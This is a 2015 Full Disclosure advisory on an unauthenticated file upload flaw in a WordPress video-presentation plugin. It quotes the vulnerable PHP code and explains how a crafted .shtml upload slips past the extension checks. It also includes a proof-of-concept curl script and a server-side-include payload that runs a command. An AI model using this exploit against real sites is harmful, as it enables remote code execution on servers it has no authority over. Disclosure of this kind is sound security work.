[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17
From: "Larry W. Cashdollar" <larry0 () me ! com>
Date: 2015-04-01 0:16:26
Message-ID: DE70A83E-3C00-4E96-B79F-7E403BE2B0C6 () me ! com
[Download RAW message or body]
Title: Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation \
v3.31.17
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/plugins/videowhisper-video-presentation/
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31 won't fix, \
http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822 Vendor Contact: \
http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=117
Description: from the site
"VideoWhisper Video Consultation is a web based video communication solution designed for \
online video consultations, interactive live presentations, trainings, webinars, coaching and \
online collaboration with webcam support. Read more on WordPress Video Presentation plugin home \
page."
Vulnerability:
From wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php Allows various remote \
unauthenticated file uploads, among the file types is html where the last 4 characters are only \
being checked in a file name to match which types are allowed. Because of this .shtml can be \
passed through and remote code execution if SSI is allowed. The code does not do any user \
access validation and therefore anyone can upload the following files to an unsuspecting \
wordpress site: .shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps \
The
if (strstr($filename,'.php')) exit;
can be by passed by using the extension .Php but the file extension check would allow files \
like test.Php.shtml <?php
if ($_GET["room"]) $room=$_GET["room"];
if ($_POST["room"]) $room=$_POST["room"];
$filename=$_FILES['vw_file']['name'];
include_once("incsan.php");
sanV($room);
if (!$room) exit;
sanV($filename);
if (!$filename) exit;
if (strstr($filename,'.php')) exit; //do not allow uploads to other folders
if ( strstr($room,"/") || strstr($room,"..") ) exit;
if ( strstr($filename,"/") || strstr($filename,"..") ) exit;
$destination="uploads/".$room."/";
if ($_GET["slides"]) $destination .= "slides/";
$ext=strtolower(substr($filename,-4)); \
$allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps");
if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination \
. $filename); ?>loadstatus=1
CVEID: TBD
OSVDB: TBD
Exploit Code:
videowhis_poc.php
<?php
$uploadfile="upexp.shtml";
$ch =
curl_init("http://target_site/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('vw_file'=>"@$uploadfile",'name'=>'upexp.shtml','room'=>'.'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
upexp.shtml
<html>
<!--#exec cmd="/usr/bin/date > /tmp/p" -->
this is html
</html>
The executeable should be located in \
wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic